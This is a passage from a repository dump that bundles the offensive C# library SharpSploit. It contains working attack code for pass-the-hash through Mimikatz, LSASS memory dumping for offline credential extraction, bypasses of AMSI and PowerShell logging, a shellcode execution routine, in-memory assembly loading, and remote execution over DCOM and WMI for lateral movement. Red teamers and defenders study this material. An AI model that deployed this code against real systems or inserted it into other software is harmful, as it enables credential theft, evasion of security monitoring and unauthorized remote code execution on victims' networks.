an alternative fully qualified domain name. Default is current domain. 190 | /// The command to execute as the specified user. 191 | /// 192 | public static string PassTheHash(string user, string NTLM, string FQDN = null, string run = "cmd.exe") 193 | { 194 | string command = "sekurlsa::pth"; 195 | command += " /user:" + user; 196 | if (FQDN != null) 197 | { 198 | command += " /domain:" + FQDN; 199 | } 200 | else 201 | { 202 | command += " /domain:" + IPGlobalProperties.GetIPGlobalProperties().DomainName; 203 | } 204 | command += " /ntlm:" + NTLM; 205 | command += " /run:" + run; 206 | return Command(command); 207 | } 208 | } 209 | } 210 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Enumeration/Host.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.IO; 7 | using System.Diagnostics; 8 | using System.Collections.Generic; 9 | using Microsoft.Win32; 10 | 11 | using SharpSploit.Generic; 12 | 13 | namespace SharpSploit.Enumeration 14 | { 15 | /// 16 | /// Host is a library for local host enumeration. 17 | /// 18 | public class Host 19 | { 20 | /// 21 | /// Gets a list of running processes on the system. 22 | /// 23 | /// List of ProcessResults. 24 | public static SharpSploitResultList GetProcessList() 25 | { 26 | Process[] processes = Process.GetProcesses(); 27 | SharpSploitResultList results = new SharpSploitResultList(); 28 | foreach (Process process in processes) 29 | { 30 | results.Add(new ProcessResult(process.Id, 0, process.ProcessName)); 31 | } 32 | return results; 33 | } 34 | 35 | /// 36 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 37 | /// if dumping the LSASS process. (Requires Admin) 38 | /// 39 | /// Process ID of the process to generate a minidump for. 40 | /// Path to write output file in. Defaults to the current directory. 41 | /// Filename to ouput the minidump to. 42 | /// 43 | /// Authored by Justin Bui (@youslydawg). 44 | /// 45 | public static void CreateProcessDump(int processId, string outputPath = "", string outputFileName = "") 46 | { 47 | CreateProcessDump(Process.GetProcessById(processId), outputPath, outputFileName); 48 | } 49 | 50 | /// 51 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 52 | /// if dumping the LSASS process. (Requires Admin) 53 | /// 54 | /// Name of the process to generate a minidump for. 55 | /// Path to write output file in. Defaults to the current directory. 56 | /// Filename to ouput the minidump to. 57 | /// 58 | /// Authored by Justin Bui (@youslydawg). 59 | /// 60 | public static void CreateProcessDump(string processName = "lsass", string outputPath = "", string outputFileName = "") 61 | { 62 | if (processName.EndsWith(".exe")) 63 | { 64 | processName = processName.Substring(0, processName.Length - 4); 65 | } 66 | Process[] process_list = Process.GetProcessesByName(processName); 67 | if (process_list.Length > 0) 68 | { 69 | CreateProcessDump(process_list[0], outputPath, outputFileName); 70 | } 71 | } 72 | 73 | /// 74 | /// Generates a minidump that represents the memory of a running process. Useful for offline Mimikatz 75 | /// if dumping the LSASS process. (Requires Admin) 76 | /// 77 | /// Process to generate a minidump for. 78 | /// Path to write output file in. Defaults to the current directory. 79 | /// Filename to ouput the minidump to. 80 | /// 81 | /// Authored by Justin Bui (@youslydawg). 82 | /// 83 | public static void CreateProcessDump(Process process, string outputPath = "", string outputFileName = "") 84 | { 85 | if (outputPath == "" || outputPath == null) 86 | { 87 | outputPath = GetCurrentDirectory(); 88 | } 89 | if (outputFileName == "" || outputFileName == null) 90 | { 91 | outputFileName = process.ProcessName + "_" + process.Id + ".dmp"; 92 | } 93 | 94 | string fullPath = Path.Combine(outputPath, outputFileName); 95 | FileStream fileStream = File.Create(fullPath); 96 | bool success = false; 97 | try 98 | { 99 | success = Execution.Win32.Dbghelp.MiniDumpWriteDump(process.Handle, (uint)process.Id, fileStream.SafeFileHandle, Execution.Win32.Dbghelp.MINIDUMP_TYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 100 | } 101 | catch (System.ComponentModel.Win32Exception e) 102 | { 103 | Console.Error.WriteLine(e.Message); 104 | } 105 | 106 | fileStream.Close(); 107 | if (!success) 108 | { 109 | File.Delete(fullPath); 110 | } 111 | } 112 | 113 | /// 114 | /// Gets the hostname of the system. 115 | /// 116 | /// Hostname of the system. 117 | public static string GetHostname() 118 | { 119 | return Environment.MachineName; 120 | } 121 | 122 | /// 123 | /// Gets the Domain name and username of the current logged on user. 124 | /// 125 | /// Current username. 126 | public static string GetUsername() 127 | { 128 | return Environment.UserDomainName + "\\" + Environment.UserName; 129 | } 130 | 131 | /// 132 | /// Gets the full path of the current working directory. 133 | /// 134 | /// Current working directory. 135 | public static string GetCurrentDirectory() 136 | { 137 | return Directory.GetCurrentDirectory(); 138 | } 139 | 140 | /// 141 | /// Gets a directory listing of the current working directory. 142 | /// 143 | /// List of FileSystemEntryResults. 144 | public static SharpSploitResultList GetDirectoryListing() 145 | { 146 | SharpSploitResultList results = new SharpSploitResultList(); 147 | foreach (string dir in Directory.GetDirectories(GetCurrentDirectory())) 148 | { 149 | results.Add(new FileSystemEntryResult(dir)); 150 | } 151 | foreach (string file in Directory.GetFiles(GetCurrentDirectory())) 152 | { 153 | results.Add(new FileSystemEntryResult(file)); 154 | } 155 | return results; 156 | } 157 | 158 | /// 159 | /// Changes the current directory by appending a specified string to the current working directory. 160 | /// 161 | /// String to append to the current directory. 162 | public static void ChangeCurrentDirectory(string AppendDirectory) 163 | { 164 | Directory.SetCurrentDirectory(GetCurrentDirectory() + "\\" + AppendDirectory); 165 | } 166 | 167 | /// 168 | /// Reads a value stored in registry. 169 | /// 170 | /// The full path to the registry value to be read. 171 | /// 172 | public static string RegistryRead(string RegPath) 173 | { 174 | var split = RegPath.Split(Path.DirectorySeparatorChar); 175 | string valueName = split[split.Length - 1]; 176 | string keyName = RegPath.Substring(0, RegPath.IndexOf(valueName)); 177 | return RegistryRead(keyName, valueName); 178 | } 179 | 180 | /// 181 | /// Reads a value stored in registry. 182 | /// 183 | /// The RegistryKey to read from. 184 | /// The name of name/value pair to read from in the RegistryKey. 185 | /// 186 | public static string RegistryRead(string RegKey, string RegValue) 187 | { 188 | try 189 | { 190 | object reg = Registry.GetValue(RegKey, RegValue, null); 191 | if (reg == null) 192 | { 193 | return null; 194 | } 195 | return reg.ToString(); 196 | } 197 | catch (Exception e) 198 | { 199 | Console.Error.WriteLine("Registry read exception: " + e.Message); 200 | return null; 201 | } 202 | } 203 | 204 | /// 205 | /// Writes a value in the registry. 206 | /// 207 | /// The full path to the registry value to be written to. 208 | /// The value to write to the registry key. 209 | /// 210 | public static bool RegistryWrite(string RegPath, object Value) 211 | { 212 | var split = RegPath.Split(Path.DirectorySeparatorChar); 213 | string valueName = split[split.Length - 1]; 214 | string keyName = RegPath.Substring(0, RegPath.IndexOf(valueName)); 215 | return RegistryWrite(keyName, valueName, Value); 216 | } 217 | 218 | /// 219 | /// Writes a value in the registry. 220 | /// 221 | /// The RegistryKey to read from. 222 | /// The name of name/value pair to read from in the RegistryKey. 223 | /// The value to write to the registry key. 224 | /// 225 | public static bool RegistryWrite(string RegKey, string RegValue, object Value) 226 | { 227 | try 228 | { 229 | Registry.SetValue(RegKey, RegValue, Value); 230 | return true; 231 | } 232 | catch (Exception e) 233 | { 234 | Console.Error.WriteLine("Registry write exception: " + e.Message); 235 | return false; 236 | } 237 | } 238 | 239 | /// 240 | /// ProcessResult represents a running process, used with the GetProcessList() function. 241 | /// 242 | public sealed class ProcessResult : SharpSploitResult 243 | { 244 | public int Pid { get; } = 0; 245 | public int Ppid { get; } = 0; 246 | public string Name { get; } = ""; 247 | protected internal override IList ResultProperties 248 | { 249 | get 250 | { 251 | return new List 252 | { 253 | new SharpSploitResultProperty 254 | { 255 | Name = "Pid", 256 | Value = this.Pid 257 | }, 258 | new SharpSploitResultProperty 259 | { 260 | Name = "Ppid", 261 | Value = this.Ppid 262 | }, 263 | new SharpSploitResultProperty 264 | { 265 | Name = "Name", 266 | Value = this.Name 267 | } 268 | }; 269 | } 270 | } 271 | 272 | public ProcessResult(int Pid = 0, int Ppid = 0, string Name = "") 273 | { 274 | this.Pid = Pid; 275 | this.Ppid = Ppid; 276 | this.Name = Name; 277 | } 278 | } 279 | 280 | /// 281 | /// FileSystemEntryResult represents a file on disk, used with the GetDirectoryListing() function. 282 | /// 283 | public sealed class FileSystemEntryResult : SharpSploitResult 284 | { 285 | public string Name { get; } = ""; 286 | protected internal override IList ResultProperties 287 | { 288 | get 289 | { 290 | return new List 291 | { 292 | new SharpSploitResultProperty 293 | { 294 | Name = "Name", 295 | Value = this.Name 296 | } 297 | }; 298 | } 299 | } 300 | 301 | public FileSystemEntryResult(string Name = "") 302 | { 303 | this.Name = Name; 304 | } 305 | } 306 | } 307 | } 308 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Execution/Assembly.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using Reflect = System.Reflection; 7 | 8 | using SharpSploit.Generic; 9 | 10 | namespace SharpSploit.Execution 11 | { 12 | /// 13 | /// Assembly is a library for loading .NET assemblies and executing methods contained within them. 14 | /// 15 | public class Assembly 16 | { 17 | /// 18 | /// Loads a specified .NET assembly byte array and executes a specified method within a 19 | /// specified type with specified parameters. 20 | /// 21 | /// The .NET assembly byte array. 22 | /// The name of the type that contains the method to execute. 23 | /// The name of the method to execute. 24 | /// The parameters to pass to the method. 25 | /// GenericObjectResult of the method. 26 | public static GenericObjectResult AssemblyExecute(byte[] AssemblyBytes, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 27 | { 28 | Reflect.Assembly assembly = Load(AssemblyBytes); 29 | Type type = TypeName == "" ? assembly.GetTypes()[0] : assembly.GetType(TypeName); 30 | Reflect.MethodInfo method = MethodName == "" ? type.GetMethods()[0] : type.GetMethod(MethodName); 31 | var results = method.Invoke(null, Parameters); 32 | return new GenericObjectResult(results); 33 | } 34 | 35 | /// 36 | /// Loads a specified base64-encoded .NET assembly and executes a specified method within a 37 | /// specified type with specified parameters. 38 | /// 39 | /// The base64-encoded .NET assembly byte array. 40 | /// The name of the type that contains the method to execute. 41 | /// The name of the method to execute. 42 | /// The parameters to pass to the method. 43 | /// GenericObjectResult of the method. 44 | public static GenericObjectResult AssemblyExecute(String EncodedAssembly, String TypeName = "", String MethodName = "Execute", Object[] Parameters = default(Object[])) 45 | { 46 | return AssemblyExecute(Convert.FromBase64String(EncodedAssembly)); 47 | } 48 | 49 | /// 50 | /// Loads a specified .NET assembly byte array. 51 | /// 52 | /// The .NET assembly byte array. 53 | /// Loaded assembly. 54 | public static Reflect.Assembly Load(byte[] AssemblyBytes) 55 | { 56 | return Reflect.Assembly.Load(AssemblyBytes); 57 | } 58 | 59 | /// 60 | /// Loads a specified .NET assembly byte array. 61 | /// 62 | /// The base64-encoded .NET assembly byte array. 63 | /// Loaded assembly. 64 | public static Reflect.Assembly Load(string EncodedAssembly) 65 | { 66 | return Reflect.Assembly.Load(Convert.FromBase64String(EncodedAssembly)); 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Execution/Shell.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Diagnostics; 9 | using System.Management.Automation; 10 | 11 | namespace SharpSploit.Execution 12 | { 13 | /// 14 | /// Shell is a library for executing shell commands. 15 | /// 16 | public class Shell 17 | { 18 | /// 19 | /// Executes specified PowerShell code using System.Management.Automation.dll and bypasses 20 | /// AMSI, ScriptBlock Logging, and Module Logging (but not Transcription Logging). 21 | /// 22 | /// PowerShell code to execute. 23 | /// Switch. If true, appends Out-String to the PowerShellCode to execute. 24 | /// Switch. If true, bypasses ScriptBlock and Module logging. 25 | /// Switch. If true, bypasses AMSI. 26 | /// Output of executed PowerShell. 27 | /// 28 | /// Credit for the AMSI bypass goes to Matt Graeber (@mattifestation). Credit for the ScriptBlock/Module 29 | /// logging bypass goes to Lee Christensen (@_tifkin). 30 | /// 31 | public static string PowerShellExecute(string PowerShellCode, bool OutString = true, bool BypassLogging = true, bool BypassAmsi = true) 32 | { 33 | if (PowerShellCode == null || PowerShellCode == "") return ""; 34 | 35 | using (PowerShell ps = PowerShell.Create()) 36 | { 37 | BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; 38 | if (BypassLogging) 39 | { 40 | var PSEtwLogProvider = ps.GetType().Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider"); 41 | if (PSEtwLogProvider != null) 42 | { 43 | var EtwProvider = PSEtwLogProvider.GetField("etwProvider", flags); 44 | var EventProvider = new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()); 45 | EtwProvider.SetValue(null, EventProvider); 46 | } 47 | } 48 | if (BypassAmsi) 49 | { 50 | var amsiUtils = ps.GetType().Assembly.GetType("System.Management.Automation.AmsiUtils"); 51 | if (amsiUtils != null) 52 | { 53 | amsiUtils.GetField("amsiInitFailed", flags).SetValue(null, true); 54 | } 55 | } 56 | ps.AddScript(PowerShellCode); 57 | if (OutString) { ps.AddCommand("Out-String"); } 58 | var results = ps.Invoke(); 59 | string output = String.Join(Environment.NewLine, results.Select(R => R.ToString()).ToArray()); 60 | ps.Commands.Clear(); 61 | return output; 62 | } 63 | } 64 | 65 | /// 66 | /// Executes a specified Shell command, optionally with an alternative username and password. 67 | /// Equates to `ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32")`. 68 | /// 69 | /// The ShellCommand to execute, including any arguments. 70 | /// Optional alternative username to execute ShellCommand as. 71 | /// Optional alternative Domain of the username to execute ShellCommand as. 72 | /// Optional password to authenticate the username to execute the ShellCommand as. 73 | /// Ouput of the ShellCommand. 74 | public static string ShellExecute(string ShellCommand, string Username = "", string Domain = "", string Password = "") 75 | { 76 | return ShellExecuteWithPath(ShellCommand, "C:\\WINDOWS\\System32\\", Username, Domain, Password); 77 | } 78 | 79 | /// 80 | /// Executes a specified Shell command from a specified directory, optionally with an alternative username and password. 81 | /// 82 | /// The ShellCommand to execute, including any arguments. 83 | /// The Path of the directory from which to execute the ShellCommand. 84 | /// Optional alternative username to execute ShellCommand as. 85 | /// Optional alternative Domain of the username to execute ShellCommand as. 86 | /// Optional password to authenticate the username to execute the ShellCommand as. 87 | /// Output of the ShellCommand. 88 | public static string ShellExecuteWithPath(string ShellCommand, string Path, string Username = "", string Domain = "", string Password = "") 89 | { 90 | if (ShellCommand == null || ShellCommand == "") return ""; 91 | 92 | string ShellCommandName = ShellCommand.Split(' ')[0]; 93 | string ShellCommandArguments = ""; 94 | if (ShellCommand.Contains(" ")) 95 | { 96 | ShellCommandArguments = ShellCommand.Replace(ShellCommandName + " ", ""); 97 | } 98 | 99 | Process shellProcess = new Process(); 100 | if (Username != "") 101 | { 102 | shellProcess.StartInfo.UserName = Username; 103 | shellProcess.StartInfo.Domain = Domain; 104 | System.Security.SecureString SecurePassword = new System.Security.SecureString(); 105 | foreach (char c in Password) 106 | { 107 | SecurePassword.AppendChar(c); 108 | } 109 | shellProcess.StartInfo.Password = SecurePassword; 110 | } 111 | shellProcess.StartInfo.FileName = ShellCommandName; 112 | shellProcess.StartInfo.Arguments = ShellCommandArguments; 113 | shellProcess.StartInfo.WorkingDirectory = Path; 114 | shellProcess.StartInfo.UseShellExecute = false; 115 | shellProcess.StartInfo.CreateNoWindow = true; 116 | shellProcess.StartInfo.RedirectStandardOutput = true; 117 | shellProcess.Start(); 118 | 119 | string output = shellProcess.StandardOutput.ReadToEnd(); 120 | shellProcess.WaitForExit(); 121 | 122 | return output; 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Execution/ShellCode.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace SharpSploit.Execution 9 | { 10 | /// 11 | /// ShellCode includes a method for executing shellcode. 12 | /// 13 | public class ShellCode 14 | { 15 | [UnmanagedFunctionPointerAttribute(CallingConvention.Cdecl)] 16 | private delegate Int32 Run(); 17 | 18 | /// 19 | /// Executes a specified ShellCode byte array by copying it to pinned memory, modifying the memory 20 | /// permissions with VirtualProtect(), and executing using a delegate. 21 | /// 22 | /// ShellCode byte array to execute. 23 | /// Boolean. True if execution succeeds, false otherwise. 24 | /// Based upon code written by Matt Nelson (@enigma0x3) and Matt Graeber (@mattifestation). 25 | public static bool ShellCodeExecute(byte[] ShellCode) 26 | { 27 | try 28 | { 29 | GCHandle pinnedArray = GCHandle.Alloc(ShellCode, GCHandleType.Pinned); 30 | IntPtr ptr = pinnedArray.AddrOfPinnedObject(); 31 | Marshal.Copy(ShellCode, 0, ptr, ShellCode.Length); 32 | 33 | uint flOldProtect = 0; 34 | if (!Win32.Kernel32.VirtualProtect(ptr, (UIntPtr)ShellCode.Length, 0x40, out flOldProtect)) 35 | { 36 | return false; 37 | } 38 | Run del = (Run)Marshal.GetDelegateForFunctionPointer(ptr, typeof(Run)); 39 | del(); 40 | return true; 41 | } 42 | catch (Exception e) 43 | { 44 | Console.Error.WriteLine("ShellCodeExecute exception: " + e.Message); 45 | } 46 | return false; 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Generic/Generic.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Text; 7 | using System.Linq; 8 | using System.Collections.Generic; 9 | using System.Collections; 10 | 11 | namespace SharpSploit.Generic 12 | { 13 | /// 14 | /// GenericObjectResult for listing objects whose type is unknown at compile time. 15 | /// 16 | public sealed class GenericObjectResult : SharpSploitResult 17 | { 18 | public object Result { get; } 19 | protected internal override IList ResultProperties 20 | { 21 | get 22 | { 23 | return new List 24 | { 25 | new SharpSploitResultProperty 26 | { 27 | Name = this.Result.GetType().Name, 28 | Value = this.Result 29 | } 30 | }; 31 | } 32 | } 33 | 34 | public GenericObjectResult(object Result) 35 | { 36 | this.Result = Result; 37 | } 38 | } 39 | 40 | /// 41 | /// SharpSploitResultList extends the IList interface for SharpSploitResults to easily 42 | /// format a list of results from various SharpSploit functions. 43 | /// 44 | /// 45 | public class SharpSploitResultList : IList where T : SharpSploitResult 46 | { 47 | private List Results { get; } = new List(); 48 | 49 | public int Count => Results.Count; 50 | public bool IsReadOnly => ((IList)Results).IsReadOnly; 51 | 52 | 53 | private const int PROPERTY_SPACE = 3; 54 | 55 | /// 56 | /// Formats a SharpSploitResultList to a string similar to PowerShell's Format-List function. 57 | /// 58 | /// string 59 | public string FormatList() 60 | { 61 | return this.ToString(); 62 | } 63 | 64 | private string FormatTable() 65 | { 66 | // TODO 67 | return ""; 68 | } 69 | 70 | /// 71 | /// Formats a SharpSploitResultList as a string. Overrides ToString() for convenience. 72 | /// 73 | /// string 74 | public override string ToString() 75 | { 76 | if (this.Results.Count > 0) 77 | { 78 | StringBuilder builder1 = new StringBuilder(); 79 | StringBuilder builder2 = new StringBuilder(); 80 | for (int i = 0; i < this.Results[0].ResultProperties.Count; i++) 81 | { 82 | builder1.Append(this.Results[0].ResultProperties[i].Name); 83 | builder2.Append(new String('-', this.Results[0].ResultProperties[i].Name.Length)); 84 | if (i != this.Results[0].ResultProperties.Count-1) 85 | { 86 | builder1.Append(new String(' ', PROPERTY_SPACE)); 87 | builder2.Append(new String(' ', PROPERTY_SPACE)); 88 | } 89 | } 90 | builder1.AppendLine(); 91 | builder1.AppendLine(builder2.ToString()); 92 | foreach (SharpSploitResult result in this.Results) 93 | { 94 | for (int i = 0; i < result.ResultProperties.Count; i++) 95 | { 96 | SharpSploitResultProperty property = result.ResultProperties[i]; 97 | string ValueString = property.Value.ToString(); 98 | builder1.Append(ValueString); 99 | if (i != result.ResultProperties.Count-1) 100 | { 101 | builder1.Append(new String(' ', Math.Max(1, property.Name.Length + PROPERTY_SPACE - ValueString.Length))); 102 | } 103 | } 104 | builder1.AppendLine(); 105 | } 106 | return builder1.ToString(); 107 | } 108 | return ""; 109 | } 110 | 111 | public T this[int index] { get => Results[index]; set => Results[index] = value; } 112 | 113 | public IEnumerator GetEnumerator() 114 | { 115 | return Results.Cast().GetEnumerator(); 116 | } 117 | 118 | IEnumerator IEnumerable.GetEnumerator() 119 | { 120 | return Results.Cast().GetEnumerator(); 121 | } 122 | 123 | public int IndexOf(T item) 124 | { 125 | return Results.IndexOf(item); 126 | } 127 | 128 | public void Add(T t) 129 | { 130 | Results.Add(t); 131 | } 132 | 133 | public void AddRange(IEnumerable range) 134 | { 135 | Results.AddRange(range); 136 | } 137 | 138 | public void Insert(int index, T item) 139 | { 140 | Results.Insert(index, item); 141 | } 142 | 143 | public void RemoveAt(int index) 144 | { 145 | Results.RemoveAt(index); 146 | } 147 | 148 | public void Clear() 149 | { 150 | Results.Clear(); 151 | } 152 | 153 | public bool Contains(T item) 154 | { 155 | return Results.Contains(item); 156 | } 157 | 158 | public void CopyTo(T[] array, int arrayIndex) 159 | { 160 | Results.CopyTo(array, arrayIndex); 161 | } 162 | 163 | public bool Remove(T item) 164 | { 165 | return Results.Remove(item); 166 | } 167 | } 168 | 169 | /// 170 | /// Abstract class that represents a result from a SharpSploit function. 171 | /// 172 | public abstract class SharpSploitResult 173 | { 174 | protected internal abstract IList ResultProperties { get; } 175 | } 176 | 177 | /// 178 | /// SharpSploitResultProperty represents a property that is a member of a SharpSploitResult's ResultProperties. 179 | /// 180 | public class SharpSploitResultProperty 181 | { 182 | public string Name { get; set; } 183 | public object Value { get; set; } 184 | } 185 | } 186 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/LateralMovement/DCOM.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Reflection; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// DCOM is a class for executing DCOM lateral movement techniques. 14 | /// 15 | public class DCOM 16 | { 17 | /// 18 | /// Execute a process on a remote system using various DCOM methods. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// 23 | /// 24 | /// DCOM execution method to use. Defaults to MMC20.Application. 25 | /// Bool. True if execution succeeds, false otherwise. 26 | /// 27 | /// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). This is 28 | /// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available 29 | /// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1 30 | /// 31 | public static bool DCOMExecute(string ComputerName, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application) 32 | { 33 | try 34 | { 35 | if (Method == DCOMMethod.MMC20_Application) 36 | { 37 | Type ComType = Type.GetTypeFromProgID("MMC20.Application", ComputerName); 38 | object RemoteComObject = Activator.CreateInstance(ComType); 39 | 40 | object Document = RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null); 41 | object ActiveView = Document.GetType().InvokeMember("ActiveView", BindingFlags.GetProperty, null, Document, null); 42 | ActiveView.GetType().InvokeMember("ExecuteShellCommand", BindingFlags.InvokeMethod, null, ActiveView, new object[] { Command, Directory, Parameters, "7" }); 43 | } 44 | else if (Method == DCOMMethod.ShellWindows) 45 | { 46 | Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName); 47 | object RemoteComObject = Activator.CreateInstance(ComType); 48 | 49 | object Item = RemoteComObject.GetType().InvokeMember("Item", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { }); 50 | object Document = Item.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, Item, null); 51 | object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null); 52 | Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 }); 53 | } 54 | else if (Method == DCOMMethod.ShellBrowserWindow) 55 | { 56 | Type ComType = Type.GetTypeFromCLSID(CLSIDs[Method], ComputerName); 57 | object RemoteComObject = Activator.CreateInstance(ComType); 58 | 59 | object Document = RemoteComObject.GetType().InvokeMember("Document", BindingFlags.GetProperty, null, RemoteComObject, null); 60 | object Application = Document.GetType().InvokeMember("Application", BindingFlags.GetProperty, null, Document, null); 61 | Application.GetType().InvokeMember("ShellExecute", BindingFlags.InvokeMethod, null, Application, new object[] { Command, Parameters, Directory, null, 0 }); 62 | } 63 | else if (Method == DCOMMethod.ExcelDDE) 64 | { 65 | Type ComType = Type.GetTypeFromProgID("Excel.Application", ComputerName); 66 | object RemoteComObject = Activator.CreateInstance(ComType); 67 | RemoteComObject.GetType().InvokeMember("DisplayAlerts", BindingFlags.SetProperty, null, RemoteComObject, new object[] { false }); 68 | RemoteComObject.GetType().InvokeMember("DDEInitiate", BindingFlags.InvokeMethod, null, RemoteComObject, new object[] { Command, Parameters }); 69 | } 70 | return true; 71 | } 72 | catch (Exception e) 73 | { 74 | Console.Error.WriteLine("DCOM Failed: " + e.Message); 75 | } 76 | return false; 77 | } 78 | 79 | /// 80 | /// Execute a process on a remote system using various DCOM methods. 81 | /// 82 | /// ComputerNames of remote systems to execute process. 83 | /// Command to execute on remote system. 84 | /// 85 | /// 86 | /// DCOM execution method to use. Defaults to MMC20.Application. 87 | /// Bool. True if execution succeeds, false otherwise. 88 | /// 89 | /// Credit for the DCOM lateral movement techniques goes to Matt Nelson (@enigma0x3). This is 90 | /// a port of Steve Borosh (rvrshell)'s Invoke-DCOM implementation available 91 | /// here: https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1 92 | /// 93 | public static List DCOMExecute(List ComputerNames, string Command, string Parameters = "", string Directory = "C:\\WINDOWS\\System32\\", DCOMMethod Method = DCOMMethod.MMC20_Application) 94 | { 95 | return ComputerNames.Select(CN => DCOMExecute(CN, Command, Parameters, Directory, Method)).ToList(); 96 | } 97 | 98 | public enum DCOMMethod 99 | { 100 | MMC20_Application, 101 | ShellWindows, 102 | ShellBrowserWindow, 103 | ExcelDDE 104 | } 105 | 106 | private static readonly Dictionary CLSIDs = new Dictionary 107 | { 108 | { DCOMMethod.ShellWindows, new Guid("9BA05972-F6A8-11CF-A442-00A0C90A8F39") }, 109 | { DCOMMethod.ShellBrowserWindow, new Guid("C08AFD90-F2A1-11D1-8455-00A0C91F3880") } 110 | }; 111 | } 112 | } 113 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/LateralMovement/WMI.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Linq; 7 | using System.Management; 8 | using System.Collections.Generic; 9 | 10 | namespace SharpSploit.LateralMovement 11 | { 12 | /// 13 | /// WMI is a class for executing WMI lateral movement techniques. 14 | /// 15 | public class WMI 16 | { 17 | /// 18 | /// Execute a process on a remote system using the WMI Win32_Process.Create method. 19 | /// 20 | /// ComputerName of remote system to execute process. 21 | /// Command to execute on remote system. 22 | /// Username to authenticate as to the remote system. 23 | /// Password to authenticate the user. 24 | /// Bool. True if execution succeeds, false otherwise. 25 | public static bool WMIExecute(string ComputerName, string Command, string Username, string Password) 26 | { 27 | ConnectionOptions options = new ConnectionOptions(); 28 | options.Username = Username; 29 | options.Password = Password; 30 | 31 | ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", ComputerName), options); 32 | 33 | try 34 | { 35 | scope.Connect(); 36 | var wmiProcess = new ManagementClass(scope, new ManagementPath("Win32_Process"), new ObjectGetOptions()); 37 | 38 | ManagementBaseObject inParams = wmiProcess.GetMethodParameters("Create"); 39 | PropertyDataCollection properties = inParams.Properties; 40 | inParams["CommandLine"] = Command; 41 | 42 | ManagementBaseObject outParams = wmiProcess.InvokeMethod("Create", inParams, null); 43 | 44 | Console.WriteLine("Win32_Process Create returned: " + outParams["returnValue"].ToString()); 45 | Console.WriteLine("ProcessID: " + outParams["processId"].ToString()); 46 | return true; 47 | } 48 | catch (Exception e) 49 | { 50 | Console.Error.WriteLine("WMI Exception:" + e.Message); 51 | } 52 | return false; 53 | } 54 | 55 | /// 56 | /// Execute a process on a remote system using the WMI Win32_Process.Create method. 57 | /// 58 | /// ComputerNames of remote systems to execute process. 59 | /// Command to execute on remote system. 60 | /// Username to authenticate as to the remote system. 61 | /// Password to authenticate the user. 62 | /// Bool. True if execution succeeds, false otherwise. 63 | public static List WMIExecute(List ComputerNames, string Command, string Username, string Password) 64 | { 65 | return ComputerNames.Select(CN => WMIExecute(CN, Command, Username, Password)).ToList(); 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /SharpShell/Data/Source/SharpSploit/Misc/CountdownEvent.cs: -------------------------------------------------------------------------------- 1 | // Author: Ryan Cobb (@cobbr_io) 2 | // Project: SharpSploit (https://github.com/cobbr/SharpSploit) 3 | // License: BSD 3-Clause 4 | 5 | using System; 6 | using System.Threading; 7 | 8 | namespace SharpSploit.Misc 9 | { 10 